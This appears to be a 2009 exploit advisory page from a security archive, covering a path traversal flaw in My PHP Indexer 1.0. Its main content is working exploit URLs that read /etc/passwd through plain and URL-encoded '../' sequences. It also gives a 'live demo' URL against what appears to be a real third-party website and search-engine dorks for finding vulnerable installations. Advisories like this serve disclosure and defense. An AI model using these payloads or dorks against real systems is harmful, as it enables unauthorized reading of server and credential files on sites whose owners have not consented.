My PHP Indexer 1.0 (index.php) Local File Download Vulnerability

2009.02.21
Credit: JosS
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

# My PHP Indexer 1.0 (index.php) Local File Download Vulnerability # url: http://sourceforge.net/projects/myphpindexer/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. ----------------------------------------------- Depending the server configuration is possible that it doesn't allow us to scale directories. ----------------------------------------------- vuln file: index.php PoC: /index.php?d=[DIR]&f=[FILE] Exploit: /index.php?d=../../../../../../../../../../../etc/&f=passwd /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd live demo: [PATH] = ../../../; (%2e%2e%2f%2e%2e%2f%2e%2e%2f) [FILE] = index.php; http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php dork: "Powered by My PHP Indexer 1.0" dork (2): "priv8 :P"

References:

http://xforce.iss.net/xforce/xfdb/45830
http://www.securityfocus.com/bid/31726
http://www.milw0rm.com/exploits/6740
http://www.frsirt.com/english/advisories/2008/2796
http://secunia.com/advisories/32215


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top